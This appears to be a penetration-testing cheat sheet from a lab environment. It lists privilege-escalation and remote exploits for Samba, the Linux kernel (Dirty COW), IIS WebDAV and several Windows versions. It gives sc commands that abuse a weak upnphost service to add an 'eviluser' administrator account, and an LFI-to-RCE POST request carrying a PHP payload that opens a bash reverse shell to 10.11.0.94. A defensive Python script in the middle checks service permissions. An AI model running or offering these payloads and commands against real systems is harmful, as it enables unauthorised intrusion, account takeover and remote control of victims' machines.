Common Exploits

Samba trans2open Overflow (Linux x86) / 10.11.1.22

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

Dirty COW exploit

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

WebDAV exploit

windows/iis/iis_webdav_upload_asp

linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8

Exploit to use against the Samba service

Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046); works on Windows 7 / Windows Server 2008 and earlier operating systems. - afd.sys Privilege Escalation (MS14-040), PoC

accesschk.exe

# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
To view the service's configuration settings
# sc qc upnphost
Checking service permissions
# accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula
Usage to be written.

Notes
On systems such as Windows XP, XP SP1 and SP2, you can escalate privileges through the upnphost service.
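
A defender-side check for the misconfiguration these commands rely on, as an added example that is not part of the original notes: it parses a service security descriptor in SDDL form (as printed by `sc sdshow`) and reports allow ACEs that let broad groups such as Authenticated Users change the service configuration. The function names and sample descriptors are constructed for illustration, and deny ACEs are ignored as a simplifying assumption.

```python
import re

# SDDL right codes for service objects: code -> (access-mask bit, name).
RISKY = {
    "DC": (0x00000002, "SERVICE_CHANGE_CONFIG"),
    "WD": (0x00040000, "WRITE_DAC"),
    "WO": (0x00080000, "WRITE_OWNER"),
    "GW": (0x40000000, "GENERIC_WRITE"),
    "GA": (0x10000000, "GENERIC_ALL"),
}
# SID aliases that include ordinary, non-administrative accounts.
BROAD = {"AU": "Authenticated Users", "WD": "Everyone",
         "BU": "BUILTIN\\Users", "IU": "INTERACTIVE"}


def risky_codes(rights):
    """Return the risky right codes present in an ACE rights field."""
    if rights.lower().startswith("0x"):  # rights given as a hex access mask
        mask = int(rights, 16)
        return {c for c, (bit, _) in RISKY.items() if mask & bit}
    return RISKY.keys() & {rights[i:i + 2] for i in range(0, len(rights), 2)}


def audit_service_sddl(sddl):
    """List (trustee, right) pairs where a broad group can reconfigure the service."""
    dacl = sddl.split("D:", 1)[-1].split("S:", 1)[0]  # keep the DACL, drop the SACL
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", dacl):
        fields = ace.split(";")
        if len(fields) != 6 or fields[0] != "A":  # assumption: only plain allow ACEs
            continue
        trustee = BROAD.get(fields[5])
        if trustee:
            findings += [(trustee, RISKY[c][1]) for c in risky_codes(fields[2])]
    return sorted(findings)


# Constructed sample descriptors, in the form printed by `sc sdshow <service>`.
WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
        "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")
HARDENED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    for name, sddl in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_service_sddl(sddl))
```

An empty result means no broad group holds a configuration-changing right in the descriptor's DACL; any finding is a service whose ACL should be tightened.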
LFI to RCE
POST /section.php?page=php://input%00
[HTTP POST DATA]
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>

ms11-080

https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html